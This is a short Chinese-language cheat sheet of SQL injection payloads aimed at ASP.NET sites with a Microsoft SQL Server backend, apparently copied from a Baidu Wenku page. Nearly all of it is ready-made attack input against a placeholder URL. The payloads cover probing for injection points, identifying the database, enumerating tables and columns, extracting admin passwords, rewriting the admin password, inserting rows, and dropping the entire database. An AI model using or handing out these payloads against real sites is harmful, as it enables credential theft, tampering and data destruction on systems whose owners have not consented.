判断注入点:
1、数字型
http://www.targer.com/article.aspx?id=1
http://www.targer.com/article.aspx?id=1'
http://www.targer.com/article.aspx?id=1 and 1=1
http://www.targer.com/article.aspx?id=1 and 1=2
2、字符型
http://www.targer.com/article.aspx?action=value' and 1=1
http://www.targer.com/article.aspx?action=value' and 1=2
3、搜索型
searchpoints%' and 1=1
searchpoints%' and 1=2
确定数据库类型:
http://www.targer.com/article.aspx?id=1 and user>0
http://www.targer.com/article.aspx?id=1 and (select count(*) from sysobjects)>0
查询当前用户数据信息:
article.aspx?id=1 having 1=1--
暴当前表中的列:
article.aspx?id=1 group by admin.username having 1=1--
article.aspx?id=1 group by admin.username,admin.password having 1=1--
暴任意表和列:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id('admin'),N) from sysobjects)>1
暴数据库数据:
and (select top 1 password from admin where id=N)>1
修改数据库中的数据:
;update admin set password='oooooo' where username='xxx'
增添数据库中的数据:
;insert into admin values (xxx,oooooo)--
删除数据库:
;drop database webdata
常用SQL总结:
获取当前数据库用户名:and user>0
获取当前数据库名:and db_name()>0
获取数据库版本:and (select @@version)>0
判断是否支持多句查询:;declare @a int--
判断是否支持子查询:and (select count(1) from [sysobjects])>=0
原文地址:http://wenku.baidu.com/link?url=HUz29K2oQStQY5xhqX84mI622D0tjsiuBN-seONO9YYf0OM12KlEs3Sw5pxwu1Iw2INeWJ-njqNKCWM2d7rMZ1cATTWiyBep5WO0bC2EFjW